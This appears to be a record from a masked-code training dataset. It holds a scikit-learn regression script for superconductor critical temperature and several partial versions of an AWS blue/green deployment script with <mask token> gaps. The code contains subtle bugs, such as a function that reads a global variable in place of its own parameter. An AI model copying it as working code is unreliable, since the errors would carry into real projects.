X_train = preprocessing.scale(X_train)
X_test = preprocessing.scale(X_test)
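# Note: preprocessing.scale() standardizes each split independently here; the
# more common pattern (an assumption, not what this script does) is a
# StandardScaler fitted on X_train only and then applied to X_test, so both
# splits share the same statistics.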
results = {}
R = Regression(X_train, X_test, y_train, y_test)
dict = R.run()
print (dict)
draw.draw(dict, 'r2_score')
draw.draw(dict, 'max_error')
draw.draw(dict, 'explained_variance_score')
draw.draw(dict, 'mean_absolute_error')
draw.draw(dict, 'mean_squared_error')
draw.draw(dict, 'mean_squared_log_error')
draw.draw(dict, 'median_absolute_error')
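# A minimal extra baseline sketch for one of the candidate models listed above
# (random forest). RandomForestRegressor is standard scikit-learn API, but the
# hyper-parameter values here are arbitrary assumptions, not tuned choices:
from sklearn.ensemble import RandomForestRegressor
rf = RandomForestRegressor(n_estimators=100, random_state=1)
rf.fit(X_train, y_train)
print('random forest r2_score', mets.r2_score(y_test, rf.predict(X_test)))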
sys.exit()
|
flexible
|
{
"blob_id": "1e34087719f6fd0456d2722edbd0a7af68d37e4c",
"index": 1577,
"step-1": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\n<mask token>\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n",
"step-3": "<mask token>\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\ndf, col = read_atomic_data('unique_m.csv')\nX_train, X_test, y_train, y_test = get_dataset(df, col)\n<mask token>\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n",
"step-4": "import pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import metrics\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge, LinearRegression\nimport os\nimport sys\nimport sklearn.metrics as mets\nfrom review import set_metrics as set_metrics\nfrom algo import Regression\nimport draw\n\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print('To begin with, your path to data should be proper!')\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist()\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3,\n random_state=1)\n return X_train, X_test, y_train, y_test\n\n\ndf, col = read_atomic_data('unique_m.csv')\nX_train, X_test, y_train, y_test = get_dataset(df, col)\nfrom sklearn import preprocessing\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint(dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\nsys.exit()\n",
"step-5": "import pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier\nfrom sklearn.model_selection import train_test_split # Import train_test_split function\nfrom sklearn import metrics #Import scikit-learn metrics module for accuracy calculation\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.linear_model import BayesianRidge, LinearRegression\nimport os\nimport sys\nimport sklearn.metrics as mets\nfrom review import set_metrics as set_metrics\nfrom algo import Regression\nimport draw\n#https://datascience.stackexchange.com/questions/989/svm-using-scikit-learn-runs-endlessly-and-never-completes-execution\n#https://machinelearningmastery.com/time-series-prediction-lstm-recurrent-neural-networks-python-keras/\n#https://datascienceplus.com/keras-regression-based-neural-networks/\n\n#xgboost\n#random forest\n#lstm\n#rnn\n#dec tree\n#logistic regression\n#ann\n#naive bayes\n#monte carlo\n\ndef read_atomic_data(path):\n if not path or not os.path.exists(path) or not os.path.isfile(path):\n print(\"To begin with, your path to data should be proper!\")\n sys.exit(1)\n df = pd.read_csv(path)\n columns = df.columns.tolist() # get the columns\n columns = columns[:-1]\n df = pd.read_csv(path, usecols=columns)\n return df, columns\n\ndef get_dataset(df, columns):\n X = df[col[:-1]]\n y = df.critical_temp\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1) \n return (X_train, X_test, y_train, y_test)\n\ndf, col = read_atomic_data(\"unique_m.csv\")\n(X_train, X_test, y_train, y_test) = get_dataset(df, col)\nfrom sklearn import preprocessing\nX_train = preprocessing.scale(X_train)\nX_test = preprocessing.scale(X_test)\nresults = {}\nR = Regression(X_train, X_test, y_train, y_test)\ndict = R.run()\nprint (dict)\ndraw.draw(dict, 'r2_score')\ndraw.draw(dict, 'max_error')\ndraw.draw(dict, 'explained_variance_score')\ndraw.draw(dict, 'mean_absolute_error')\ndraw.draw(dict, 'mean_squared_error')\ndraw.draw(dict, 'mean_squared_log_error')\ndraw.draw(dict, 'median_absolute_error')\n\nsys.exit()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
live_alias: Your external DNS record pointing to live web server.
        future_value: The value the record should point to (an alias fqdn or an IP).
        alias_dns_name: blue.<domain> or green.<domain> for alias records, or None for a plain A record.
        zone: handle to zone that hosts dns records.
        records: set of dns records from the zone.
    :return: Result of the change (AWS response).
"""
try:
change = records.add_change(action='UPSERT', name=live_alias, ttl=
300, type='A', alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (
live_alias, ex))
sys.exit(1)
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect_to_aws(region, aws_access_key, aws_secret_key):
"""
:param:
region: AWS region
aws_access_key: AWS Access Key
aws_secret_key: AWS Secret Key
:return: map of aws services and connection handles for them.
"""
ec2_conn = ec2.connect_to_region(region_name=region, aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
route53_conn = route53.Route53Connection(aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
if ec2_conn is None:
logging.error(
            'Could not connect to EC2 with these parameters: %s, %s, <secret key>'
, region, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS EC2 [%s]', region)
if route53_conn is None:
logging.error(
            'Could not connect to Route53 with these parameters: %s, <secret key>'
, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS Route53')
return {'ec2': ec2_conn, 'route53': route53_conn}
def get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):
"""
:description: Returns requested instance - uses filters to get it.
:param
ec2_conn: Connections to AWS EC2.
tag_key: Name of the tag.
tag_value: Value of the tag.
instance_state: One of three states - "running" / "pending" / "stopped".
:return: boolean result.
"""
instances = ec2_conn.get_only_instances(filters={'tag:{0}'.format(
tag_key): tag_value, 'instance-state-name': instance_state})
return instances
def create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id,
env, instance_name, user_data=None, instance_size='t2.micro', shutdown=
'stop', dry_run=False):
"""
:param
ec2_conn: connection to AWS EC2 service
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
env: Environment (blue / green / old_app)
instance_name: Name tag value
user_data: Cloud-Init script that will run once
instance_size: String with instance size
shutdown_behaviour: stop or termination
dry-run: True or False. If True, it will not make any changes.
    :return: list with the created instance(s), 'OK' on a dry run, or None
"""
instances = get_specific_instances(ec2_conn, 'Environment', env, [
'running', 'pending'])
if not instances:
try:
reservations = ec2_conn.run_instances(image_id, key_name=
ssh_key, user_data=user_data, instance_type=instance_size,
subnet_id=subnet_id, security_group_ids=sec_group,
instance_initiated_shutdown_behavior=shutdown, dry_run=dry_run)
if reservations is not None and not dry_run:
tag_new_instance(reservations.instances[0], instance_name, env)
else:
LOGGER.error('Something went wrong when creating new instance.'
)
sys.exit(1)
except exception.EC2ResponseError:
if dry_run:
LOGGER.warn(
'New instance would be created and this tags should be assigned'
)
LOGGER.warn('Name: %s' % instance_name)
LOGGER.warn('Environment: %s' % env)
LOGGER.warn('Deployment Date: %s' % time.strftime('%d-%m-%Y'))
return 'OK'
else:
LOGGER.error('Something went wrong when creating new instance.'
)
try:
time.sleep(60)
tag_new_instance(reservations.instances[0],
instance_name, env)
except exception.EC2ResponseError:
sys.exit(1)
else:
LOGGER.warn(
'There is another instance running with %s environment tag (id: %s).'
% (env, instances[0]))
return None
return reservations.instances
def tag_instance(instance, tag_name, tag_key):
"""
:description: Removes old tag and creates new one with updated value.
:param
instance: Instance that should be tagged.
tag_name: Name of the tag.
tag_key: Value of the tag.
:return: None
"""
instance.remove_tag('{0}'.format(tag_name))
instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))
<|reserved_special_token_0|>
def stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):
"""
    :description: Stops the previously live instance.
:param
aws_connection: Connections to AWS Route53 service and EC2.
env: Blue or green depends which instance you want to stop (cross check).
domain: Your Domain.
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: boolean result.
"""
result = False
tag = ''.join(tag.values())
instances = get_specific_instances(aws_connection.get('ec2'),
'Environment', env, 'running')
if check_which_is_live(aws_connection.get('route53'), domain, live_alias
) != env + '.' + domain and instances:
try:
aws_connection.get('ec2').stop_instances(instance_ids=[
instances[0].id], dry_run=dry_run)
tag_instance(instances[0], 'Environment', tag)
except exception.EC2ResponseError:
LOGGER.warn(
'Instance %s would be stopped and tagged with Environment:%s' %
(instances[0].id, tag))
result = True
elif dry_run:
LOGGER.warning('Old instance with tag %s would be stopped.' % env)
else:
LOGGER.error(
            'Could not stop the old instance. It looks like it is live or does not exist. I tried to stop %s instance.'
% env)
return result
<|reserved_special_token_0|>
def get_env(fqdn, domain):
"""
    :description: Gives you the environment from a given fqdn by removing the domain.
:param
fqdn: Fully Qualified Domain Name.
domain: Your domain name.
:return: environment (blue or green).
"""
env = fqdn.replace('.' + domain, '')
return env
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
live_alias: Your external DNS record pointing to live web server.
        future_value: The value the record should point to (an alias fqdn or an IP).
        alias_dns_name: blue.<domain> or green.<domain> for alias records, or None for a plain A record.
        zone: handle to zone that hosts dns records.
        records: set of dns records from the zone.
    :return: Result of the change (AWS response).
"""
try:
change = records.add_change(action='UPSERT', name=live_alias, ttl=
300, type='A', alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (
live_alias, ex))
sys.exit(1)
return result
def swap_live_with_staging(aws_connection, domain, current_live, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
aws_connection: Connections to AWS Route53 service and EC2
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which is live
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
    :return: Result of the change (AWS response).
"""
route53_conn = aws_connection.get('route53')
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('DNS record %s would be updated with %s' % (live_alias,
green_alias if current_live == blue_alias else blue_alias))
result = 'OK'
elif current_live == blue_alias:
result = swap_dns(live_alias, green_alias, green_alias, zone, records)
else:
result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)
return result
def assign_to_staging(route53_conn, domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Assigns newly created instance to staging url
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which one was behind your live url.
instance_public_ip: Public IP of newly created instance that would be assigned to staging url.
dry-run: True or False. If True, it will not make any changes.
    :return: Result of the change (AWS response).
"""
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('Public IP %s would be assigned to %s' % (
instance_public_ip, live_alias))
result = 'OK'
else:
result = swap_dns(blue_alias if current_live == green_alias else
green_alias, instance_public_ip, None, zone, records)
return result
<|reserved_special_token_0|>
def simple_check(url):
"""
    :description: Checks whether the given url returns a 200 response code, retrying up to 10 times at 60-second intervals.
:param
url: link which should be checked
:return: Boolean
"""
counter = 0
while counter < 10:
try:
r = requests.head('http://' + url)
LOGGER.debug(r.status_code)
if r.status_code == 200:
return True
else:
time.sleep(60)
except requests.ConnectionError:
            LOGGER.error('Failed to get response code from %s - attempt #%s' %
                (url, counter + 1))
        counter += 1
    return False
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_config_file(logger):
import aws_config
try:
domain = getattr(aws_config, 'domain')
config = {'reg': getattr(aws_config, 'region'), 'access': getattr(
aws_config, 'access_key'), 'secret': getattr(aws_config,
'secret_key'), 'srv': getattr(aws_config, 'instance_name'),
'domain': domain, 'alias': getattr(aws_config,
'live_record_name') + '.' + domain, 'image': getattr(aws_config,
'ami_id'), 'key': getattr(aws_config, 'key_pair'), 'sec': [
getattr(aws_config, 'security_group')], 'subnet': getattr(
aws_config, 'subnet_id'), 'type': getattr(aws_config,
'instance_size'), 'shutdown': getattr(aws_config,
'shutdown_behavior'), 'dry-run': getattr(aws_config, 'dry_run')}
except AttributeError as at_err:
logger.error('Could not read parameters from aws_config.py file. [%s]',
at_err)
        region = os.environ.get('AWS_DEFAULT_REGION')
        aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
        aws_secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
        if region is None or aws_access_key is None or aws_secret_key is None:
            logger.error('Could not find AWS credentials in environment variables')
            sys.exit(1)
        else:
            logger.info('Got AWS credentials from environment variables')
            config = {'reg': region, 'access': aws_access_key, 'secret':
                aws_secret_key}
    return config
<|reserved_special_token_0|>
def connect_to_aws(region, aws_access_key, aws_secret_key):
"""
:param:
region: AWS region
aws_access_key: AWS Access Key
aws_secret_key: AWS Secret Key
:return: map of aws services and connection handles for them.
"""
ec2_conn = ec2.connect_to_region(region_name=region, aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
route53_conn = route53.Route53Connection(aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
if ec2_conn is None:
logging.error(
            'Could not connect to EC2 with these parameters: %s, %s, <secret key>'
, region, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS EC2 [%s]', region)
if route53_conn is None:
logging.error(
            'Could not connect to Route53 with these parameters: %s, <secret key>'
, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS Route53')
return {'ec2': ec2_conn, 'route53': route53_conn}
def get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):
"""
:description: Returns requested instance - uses filters to get it.
:param
ec2_conn: Connections to AWS EC2.
tag_key: Name of the tag.
tag_value: Value of the tag.
instance_state: One of three states - "running" / "pending" / "stopped".
:return: boolean result.
"""
instances = ec2_conn.get_only_instances(filters={'tag:{0}'.format(
tag_key): tag_value, 'instance-state-name': instance_state})
return instances
def create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id,
env, instance_name, user_data=None, instance_size='t2.micro', shutdown=
'stop', dry_run=False):
"""
:param
ec2_conn: connection to AWS EC2 service
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
env: Environment (blue / green / old_app)
instance_name: Name tag value
user_data: Cloud-Init script that will run once
instance_size: String with instance size
shutdown_behaviour: stop or termination
dry-run: True or False. If True, it will not make any changes.
    :return: list with the created instance(s), 'OK' on a dry run, or None
"""
instances = get_specific_instances(ec2_conn, 'Environment', env, [
'running', 'pending'])
if not instances:
try:
reservations = ec2_conn.run_instances(image_id, key_name=
ssh_key, user_data=user_data, instance_type=instance_size,
subnet_id=subnet_id, security_group_ids=sec_group,
instance_initiated_shutdown_behavior=shutdown, dry_run=dry_run)
if reservations is not None and not dry_run:
tag_new_instance(reservations.instances[0], instance_name, env)
else:
LOGGER.error('Something went wrong when creating new instance.'
)
sys.exit(1)
except exception.EC2ResponseError:
if dry_run:
LOGGER.warn(
'New instance would be created and this tags should be assigned'
)
LOGGER.warn('Name: %s' % instance_name)
LOGGER.warn('Environment: %s' % env)
LOGGER.warn('Deployment Date: %s' % time.strftime('%d-%m-%Y'))
return 'OK'
else:
LOGGER.error('Something went wrong when creating new instance.'
)
try:
time.sleep(60)
tag_new_instance(reservations.instances[0],
instance_name, env)
except exception.EC2ResponseError:
sys.exit(1)
else:
LOGGER.warn(
'There is another instance running with %s environment tag (id: %s).'
% (env, instances[0]))
return None
return reservations.instances
def tag_instance(instance, tag_name, tag_key):
"""
:description: Removes old tag and creates new one with updated value.
:param
instance: Instance that should be tagged.
tag_name: Name of the tag.
tag_key: Value of the tag.
:return: None
"""
instance.remove_tag('{0}'.format(tag_name))
instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))
<|reserved_special_token_0|>
def stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):
"""
    :description: Stops the previously live instance.
:param
aws_connection: Connections to AWS Route53 service and EC2.
env: Blue or green depends which instance you want to stop (cross check).
domain: Your Domain.
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: boolean result.
"""
result = False
tag = ''.join(tag.values())
instances = get_specific_instances(aws_connection.get('ec2'),
'Environment', env, 'running')
if check_which_is_live(aws_connection.get('route53'), domain, live_alias
) != env + '.' + domain and instances:
try:
aws_connection.get('ec2').stop_instances(instance_ids=[
instances[0].id], dry_run=dry_run)
tag_instance(instances[0], 'Environment', tag)
except exception.EC2ResponseError:
LOGGER.warn(
'Instance %s would be stopped and tagged with Environment:%s' %
(instances[0].id, tag))
result = True
elif dry_run:
LOGGER.warning('Old instance with tag %s would be stopped.' % env)
else:
LOGGER.error(
            'Could not stop the old instance. It looks like it is live or does not exist. I tried to stop %s instance.'
% env)
return result
<|reserved_special_token_0|>
def get_env(fqdn, domain):
"""
    :description: Gives you the environment from a given fqdn by removing the domain.
:param
fqdn: Fully Qualified Domain Name.
domain: Your domain name.
:return: environment (blue or green).
"""
env = fqdn.replace('.' + domain, '')
return env
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
live_alias: Your external DNS record pointing to live web server.
        future_value: The value the record should point to (an alias fqdn or an IP).
        alias_dns_name: blue.<domain> or green.<domain> for alias records, or None for a plain A record.
        zone: handle to zone that hosts dns records.
        records: set of dns records from the zone.
    :return: Result of the change (AWS response).
"""
try:
change = records.add_change(action='UPSERT', name=live_alias, ttl=
300, type='A', alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (
live_alias, ex))
sys.exit(1)
return result
def swap_live_with_staging(aws_connection, domain, current_live, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
aws_connection: Connections to AWS Route53 service and EC2
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which is live
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
    :return: Result of the change (AWS response).
"""
route53_conn = aws_connection.get('route53')
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('DNS record %s would be updated with %s' % (live_alias,
green_alias if current_live == blue_alias else blue_alias))
result = 'OK'
elif current_live == blue_alias:
result = swap_dns(live_alias, green_alias, green_alias, zone, records)
else:
result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)
return result
def assign_to_staging(route53_conn, domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Assigns newly created instance to staging url
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which one was behind your live url.
instance_public_ip: Public IP of newly created instance that would be assigned to staging url.
dry-run: True or False. If True, it will not make any changes.
    :return: Result of the change (AWS response).
"""
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('Public IP %s would be assigned to %s' % (
instance_public_ip, live_alias))
result = 'OK'
else:
result = swap_dns(blue_alias if current_live == green_alias else
green_alias, instance_public_ip, None, zone, records)
return result
<|reserved_special_token_0|>
def wait_for_public_ip(ec2_conn, instance_id):
"""
    :description: Gets instance's Public IP. Retries every 10 seconds, up to 24 attempts (about 4 minutes).
:param
ec2_conn: Connection to AWS EC2 service
instance_id: ID of instance :)
:return: Public IP or exits the script
"""
counter = 0
while counter < 24:
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
if stg_instance[0].ip_address is None:
time.sleep(10)
else:
public_ip = stg_instance[0].ip_address
return str(public_ip)
counter += 1
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)
sys.exit(1)
def simple_check(url):
"""
    :description: Checks whether the given url returns a 200 response code, retrying up to 10 times at 60-second intervals.
:param
url: link which should be checked
:return: Boolean
"""
counter = 0
while counter < 10:
try:
r = requests.head('http://' + url)
LOGGER.debug(r.status_code)
if r.status_code == 200:
return True
else:
time.sleep(60)
except requests.ConnectionError:
            LOGGER.error('Failed to get response code from %s - attempt #%s' %
                (url, counter + 1))
        counter += 1
    return False
<|reserved_special_token_0|>
def switch(region, access_key, secret_key, tag, domain, live_url,
blue_alias, green_alias, dry_run=False):
"""
    :description: Swaps live and staging by updating the live dns entry, then stops the previously live instance.
    :param
        region: AWS region
        access_key / secret_key: AWS credentials
        tag: Dictionary with <tag_name> <tag_value> pair used to re-tag the stopped instance
        domain: Your Domain
        live_url: Your external DNS record pointing to live web server.
        blue_alias / green_alias: blue.<domain> and green.<domain> records.
        dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
aws_conn = connect_to_aws(region, access_key, secret_key)
live = check_which_is_live(aws_conn.get('route53'), domain, live_url)
result = swap_live_with_staging(aws_conn, domain, live, live_url,
blue_alias, green_alias, dry_run)
time.sleep(300)
stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag,
dry_run)
return result
def roll_back(region, access_key, secret_key, tag, domain, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.
:param
        region: AWS region
        access_key / secret_key: AWS credentials
        tag: Dictionary with <tag_name> <tag_value> pair identifying the parked instance
        domain: Your Domain
        live_alias: Your external DNS record pointing to live web server.
        blue_alias / green_alias: blue.<domain> and green.<domain> records.
        dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
aws_conn = connect_to_aws(region, access_key, secret_key)
old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.
keys()), ''.join(tag.values()), ['stopped', 'running'])
current_live = check_which_is_live(aws_conn.get('route53'), domain,
live_alias)
env = get_env(current_live, domain)
if not old_instance:
LOGGER.error(
'No instance with tag %s was found. No chance to roll back Sir!' %
''.join(tag.values()))
else:
try:
if dry_run:
LOGGER.warning(
'Instance %s would be started and tagged with %s' % (
old_instance, env))
else:
old_instance[0].start()
tag_instance(old_instance[0], 'Environment', 'blue' if env ==
'green' else 'green')
instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'),
old_instance[0].id)
assign_to_staging(aws_conn.get('route53'), domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias,
dry_run=False)
swap_live_with_staging(aws_conn, domain, current_live,
live_alias, blue_alias, green_alias, dry_run)
stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)
except exception.EC2ResponseError:
LOGGER.error('Could not start %s instance.' % old_instance)
result = False
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_config_file(logger):
import aws_config
try:
domain = getattr(aws_config, 'domain')
config = {'reg': getattr(aws_config, 'region'), 'access': getattr(
aws_config, 'access_key'), 'secret': getattr(aws_config,
'secret_key'), 'srv': getattr(aws_config, 'instance_name'),
'domain': domain, 'alias': getattr(aws_config,
'live_record_name') + '.' + domain, 'image': getattr(aws_config,
'ami_id'), 'key': getattr(aws_config, 'key_pair'), 'sec': [
getattr(aws_config, 'security_group')], 'subnet': getattr(
aws_config, 'subnet_id'), 'type': getattr(aws_config,
'instance_size'), 'shutdown': getattr(aws_config,
'shutdown_behavior'), 'dry-run': getattr(aws_config, 'dry_run')}
except AttributeError as at_err:
logger.error('Could not read parameters from aws_config.py file. [%s]',
at_err)
        region = os.environ.get('AWS_DEFAULT_REGION')
        aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
        aws_secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
        if region is None or aws_access_key is None or aws_secret_key is None:
            logger.error('Could not find AWS credentials in environment variables')
            sys.exit(1)
        else:
            logger.info('Got AWS credentials from environment variables')
            config = {'reg': region, 'access': aws_access_key, 'secret':
                aws_secret_key}
    return config
<|reserved_special_token_0|>
def connect_to_aws(region, aws_access_key, aws_secret_key):
"""
:param:
region: AWS region
aws_access_key: AWS Access Key
aws_secret_key: AWS Secret Key
:return: map of aws services and connection handles for them.
"""
ec2_conn = ec2.connect_to_region(region_name=region, aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
route53_conn = route53.Route53Connection(aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
if ec2_conn is None:
logging.error(
            'Could not connect to EC2 with these parameters: %s, %s, <secret key>'
, region, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS EC2 [%s]', region)
if route53_conn is None:
logging.error(
            'Could not connect to Route53 with these parameters: %s, <secret key>'
, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS Route53')
return {'ec2': ec2_conn, 'route53': route53_conn}
def get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):
"""
:description: Returns requested instance - uses filters to get it.
:param
ec2_conn: Connections to AWS EC2.
tag_key: Name of the tag.
tag_value: Value of the tag.
instance_state: One of three states - "running" / "pending" / "stopped".
:return: boolean result.
"""
instances = ec2_conn.get_only_instances(filters={'tag:{0}'.format(
tag_key): tag_value, 'instance-state-name': instance_state})
return instances
def create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id,
env, instance_name, user_data=None, instance_size='t2.micro', shutdown=
'stop', dry_run=False):
"""
:param
ec2_conn: connection to AWS EC2 service
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
env: Environment (blue / green / old_app)
instance_name: Name tag value
user_data: Cloud-Init script that will run once
instance_size: String with instance size
shutdown_behaviour: stop or termination
dry-run: True or False. If True, it will not make any changes.
    :return: list with the created instance(s), 'OK' on a dry run, or None
"""
instances = get_specific_instances(ec2_conn, 'Environment', env, [
'running', 'pending'])
if not instances:
try:
reservations = ec2_conn.run_instances(image_id, key_name=
